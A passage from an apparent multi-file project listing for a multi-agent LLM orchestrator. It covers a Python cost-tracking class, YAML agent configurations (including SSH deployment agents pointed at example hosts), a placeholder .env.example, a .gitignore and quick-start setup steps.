        if self.budget_limit and not self._warning_sent:
            if self.total_cost >= self.budget_limit * self.warning_threshold:
                self._warning_sent = True
                if self.on_budget_warning:
                    self.on_budget_warning(self.total_cost, self.budget_limit)
        
        return cost
    
    def record_from_response(self, response) -> Optional[RequestCost]:
        """Record from a ProviderResponse object."""
        if not response.usage:
            return None
        
        return self.record(
            model=response.model,
            input_tokens=response.usage.input_tokens,
            output_tokens=response.usage.output_tokens,
            cache_read_tokens=getattr(response.usage, 'cache_read_tokens', 0),
            cache_creation_tokens=getattr(response.usage, 'cache_creation_tokens', 0),
        )
    
    @property
    def total_cost(self) -> float:
        """Total cost across all requests."""
        return sum(r.total_cost for r in self._requests)
    
    @property
    def total_tokens(self) -> int:
        """Total tokens across all requests."""
        return sum(r.total_tokens for r in self._requests)
    
    @property
    def remaining_budget(self) -> Optional[float]:
        """Remaining budget in USD, or None if no limit."""
        if self.budget_limit is None:
            return None
        return max(0, self.budget_limit - self.total_cost)
    
    @property
    def is_over_budget(self) -> bool:
        """Check if over budget."""
        if self.budget_limit is None:
            return False
        return self.total_cost >= self.budget_limit
    
    @property
    def summary(self) -> CostSummary:
        """Get cost summary."""
        summary = CostSummary()
        
        for request in self._requests:
            summary.total_requests += 1
            summary.total_input_tokens += request.input_tokens
            summary.total_output_tokens += request.output_tokens
            summary.total_cache_read_tokens += request.cache_read_tokens
            summary.total_cost_usd += request.total_cost
            
            # By model
            if request.model not in summary.by_model:
                summary.by_model[request.model] = {
                    "requests": 0,
                    "input_tokens": 0,
                    "output_tokens": 0,
                    "cost_usd": 0.0,
                }
            
            summary.by_model[request.model]["requests"] += 1
            summary.by_model[request.model]["input_tokens"] += request.input_tokens
            summary.by_model[request.model]["output_tokens"] += request.output_tokens
            summary.by_model[request.model]["cost_usd"] += request.total_cost
        
        return summary
    
    def reset(self):
        """Reset all tracked costs."""
        self._requests = []
        self._warning_sent = False
    
    def export(self) -> str:
        """Export cost data as JSON."""
        return json.dumps({
            "requests": [
                {
                    "model": r.model,
                    "input_tokens": r.input_tokens,
                    "output_tokens": r.output_tokens,
                    "cache_read_tokens": r.cache_read_tokens,
                    "total_cost": r.total_cost,
                    "timestamp": r.timestamp,
                }
                for r in self._requests
            ],
            "summary": self.summary.to_dict(),
            "budget_limit": self.budget_limit,
        }, indent=2)
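
As a sanity check on the arithmetic in `RequestCost`, here is the same formula applied by hand for a hypothetical sonnet-sized request ($3/M input, $15/M output, cache reads billed at 10% of the input rate, per the table above; all token counts are made up):

```python
# Worked example of RequestCost's cost formula with made-up token counts.
rates = {"input": 3.0, "output": 15.0}        # claude-sonnet rates from COST_PER_MILLION
input_tokens, output_tokens, cache_read = 10_000, 2_000, 4_000

regular_input = input_tokens - cache_read                         # 6_000 uncached input tokens
input_cost = (regular_input / 1_000_000) * rates["input"]         # $0.018
input_cost += (cache_read / 1_000_000) * rates["input"] * 0.1     # + $0.0012 for cache reads
output_cost = (output_tokens / 1_000_000) * rates["output"]       # $0.03

total = input_cost + output_cost
print(f"${total:.4f}")  # $0.0492
```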

Configuration Examples

examples/simple.yaml

# Simple single agent configuration

settings:
  default_provider: claude
  default_model: sonnet

agents:
  assistant:
    role: "You are a helpful assistant."
    provider: claude
    model: sonnet
    tools:
      - bash
      - read
      - write

examples/dev_team.yaml

# Software development team

settings:
  default_provider: claude
  default_model: sonnet
  timeout: 300
  sandbox_paths: true

agents:
  architect:
    role: |
      You are a senior software architect.
      You design scalable and maintainable systems.
      You make important technical decisions.
      You document decisions in ADRs (Architecture Decision Records).
    provider: claude
    model: opus
    tools:
      - read
      - write
      - list_dir
      - glob
  
  developer:
    role: |
      You are an experienced full-stack developer.
      You write clean, well-documented, and testable code.
      You follow language best practices.
      You always include appropriate error handling.
    provider: claude
    model: sonnet
    tools:
      - read
      - write
      - bash
      - grep
      - glob
  
  reviewer:
    role: |
      You are a demanding but constructive code reviewer.
      You look for bugs, security issues, and improvements.
      You suggest refactoring when needed.
      You validate that code follows standards.
    provider: litellm
    model: gpt4o
    tools:
      - read
      - grep
      - glob
  
  tester:
    role: |
      You are a QA engineer specialized in testing.
      You write unit, integration, and e2e tests.
      You identify edge cases and error scenarios.
      You ensure good test coverage.
    provider: litellm
    model: gemini-pro
    tools:
      - read
      - write
      - bash

examples/devops.yaml

# DevOps team with server access

settings:
  default_provider: claude
  default_model: sonnet
  timeout: 300
  ssh_strict_host_checking: true

servers:
  production:
    host: prod.example.com
    user: deploy
    key: ~/.ssh/deploy_key
    description: "Production server"
  
  staging:
    host: staging.example.com
    user: deploy
    key: ~/.ssh/deploy_key
    description: "Staging server"

agents:
  deployer:
    role: |
      You are a deployment specialist.
      You deploy applications safely to production.
      You always verify deployments succeed.
      You rollback immediately if issues are detected.
    provider: claude
    model: sonnet
    tools:
      - ssh
      - bash
      - read
    servers:
      - production
      - staging
  
  monitor:
    role: |
      You are a systems monitoring expert.
      You check server health and metrics.
      You identify issues before they become problems.
    provider: claude
    model: haiku
    tools:
      - ssh
      - http_request
      - read
    servers:
      - production
      - staging
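
For reference, the `ssh` tool maps a server entry like `production` above into an argv along these lines, mirroring the `_exec_ssh` implementation (the remote command `uptime` is a hypothetical example):

```python
# Rough mapping from a server config entry to the argv built by _exec_ssh.
host, user, key, port = "prod.example.com", "deploy", "~/.ssh/deploy_key", 22
strict_host_checking = True   # settings.ssh_strict_host_checking

ssh_cmd = [
    "ssh",
    "-o", f"StrictHostKeyChecking={'yes' if strict_host_checking else 'no'}",
    "-o", "BatchMode=yes",       # never prompt for a password
    "-o", "ConnectTimeout=10",
    "-i", key,
    "-p", str(port),
    f"{user}@{host}",
    "uptime",                    # the (validated) remote command
]
print(" ".join(ssh_cmd))
```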

examples/local_ollama.yaml

# Using local Ollama models (no API costs!)
#
# Requirements:
# 1. Install Ollama: https://ollama.ai
# 2. Pull models: ollama pull llama3
# 3. pip install litellm

settings:
  default_provider: litellm
  default_model: llama3
  timeout: 120
  max_tool_iterations: 15

agents:
  assistant:
    role: |
      You are a helpful assistant running locally.
      You can execute commands and work with files.
    provider: litellm
    model: llama3
    tools:
      - bash
      - read
      - write
      - list_dir
  
  coder:
    role: |
      You are a coding assistant specialized in programming.
      You write clean, efficient code.
    provider: litellm
    model: codellama
    tools:
      - read
      - write
      - bash
      - grep

.env.example

# .env.example - Copy to .env and fill in your values

# API Keys
OPENAI_API_KEY=sk-...
GOOGLE_API_KEY=...
ANTHROPIC_API_KEY=...
MISTRAL_API_KEY=...
GROQ_API_KEY=...

# SSH Configuration
SSH_KEY_PATH=~/.ssh/id_rsa
SSH_KNOWN_HOSTS_CHECK=true

.gitignore

# Environment
.env
.venv/
venv/

# Python
__pycache__/
*.py[cod]
*.egg-info/

# IDE
.idea/
.vscode/

# Logs and outputs
logs/*.md
!logs/.gitkeep
outputs/**
!outputs/.gitkeep

# Secrets
*.pem
*.key

Quick Start

# 1. Create the directory structure
mkdir -p tzzr_v6/orchestrator/{core,providers,tools,agents,tracking}
mkdir -p tzzr_v6/{logs,outputs,examples}

# 2. Copy each file above into its corresponding location

# 3. Install dependencies
pip install pyyaml
pip install litellm  # optional, for GPT-4/Gemini/etc.

# 4. Run
cd tzzr_v6
python main.py